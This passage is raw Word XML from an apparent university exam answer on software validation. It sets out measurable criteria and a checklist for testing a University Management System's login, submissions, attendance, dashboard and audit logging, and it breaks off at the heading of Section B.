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354F" w14:paraId="4BAEC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4BAECE3D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F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LAHORE GARRISON UNIVERSITY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECE3E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Department of Computer Sciences</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECE3F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B9BD5"/>
              </w:rPr>
              <w:t>─────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECE40" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:pPr>
              <w:spacing w:before="80" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFD700"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Security Validation and Compliance Engineering</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECE41" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Software Verification and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Validation  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  SEE6603</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECE42" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Program: BSSE/6th   |   Time: 60 Minutes   |   Marks: 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECE44" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECE45" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>A  –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  Validation Criteria and Checklist Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE46" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Validation Criteria </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Engineering  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE47" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: Measurable Validation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Criteria  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE48" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The following measurable validation criteria are derived from the five core modules of the University Management System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE49" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354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52354F" w14:paraId="4BAECE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E4A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35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E4B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Stakeholder Expectation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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E4C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Measurable Validation Criterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAEC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4E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Student Login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4F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Secure, reliable authentication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50" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Login succeeds within 3s; failed attempts locked after 5 tries; MFA tested on 100% of accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAEC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52" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Assignment Submission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53" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Files accepted &amp; timestamped correctly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54" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>100% of valid formats (PDF/DOCX) accepted; submissions timestamped ±1s accuracy; late detection 100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>% accurate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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56" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attendance Tracking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57" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Accurate, tamper-proof records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58" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attendance recorded with ≥99.5% accuracy; no unauthorized edits allowed; audit log captures every change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAEC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5A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Faculty Dashboard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5B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Real-time data visibility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5C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Dashboard loads in ≤2s; data refreshes every 30s; role-based access enforced for 100% of views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAEC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5E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Activity Logging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5F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Complete, immutable audit trail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60" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>100% of user actions logged; logs retained ≥90 days; log tampering detected and alerted within 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECE62" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECE63" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 2: Structured Validation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Checklist  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE64" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The following checklist is structured for use in Excel/Docs documentation with status tracking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECE65" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354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"/>
        <w:gridCol w:w="1586"/>
        <w:gridCol w:w="2162"/>
        <w:gridCol w:w="1783"/>
        <w:gridCol w:w="1785"/>
        <w:gridCol w:w="1532"/>
      </w:tblGrid>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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E66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E67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E68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Validation Criterion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E69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Method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E6A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E6B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52354F" w14:paraId="4BAECE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6D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F"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6E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Student Login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6F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Login with valid credentials succeeds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0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Functional Test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1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Redirect to dashboard in ≤3s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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Student Login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6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Account locked after 5 failed attempts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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Negative Test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8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Account lock + alert email sent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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F"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C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Student Login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D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SQL Injection blocked on login form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E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Security Test (ZAP)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7F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Input rejected; no DB error exposed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0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F"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3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Assignment Sub.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4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PDF upload accepted and stored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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Functional Test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6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>File saved; confirmation shown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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F"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A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Assignment Sub.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B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Submission timestamp is accurate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C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Integration Test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D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Timestamp matches server time ±1s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8E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/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1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attendance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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Only authorized users modify records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3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Access Control Test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4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Unauthorized attempt denied; logged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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7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8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Faculty Dash.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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Dashboard loads within 2 seconds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A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Performance Test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B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Load time ≤2000ms under normal load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C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>8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9F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Faculty Dash.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0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Role-based access control enforced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1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Security Test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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Student cannot access faculty view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3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>9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6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Activity Log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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>All actions logged with user &amp; time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8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Audit Test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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>100% actions appear in log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A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECE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C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>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D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Activity Log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E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logs cannot be deleted by regular users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AF" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Integrity Test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B0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Delete attempt returns 403 Forbidden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EB1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECEB3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECEB4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEB5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SECTION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>B  –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
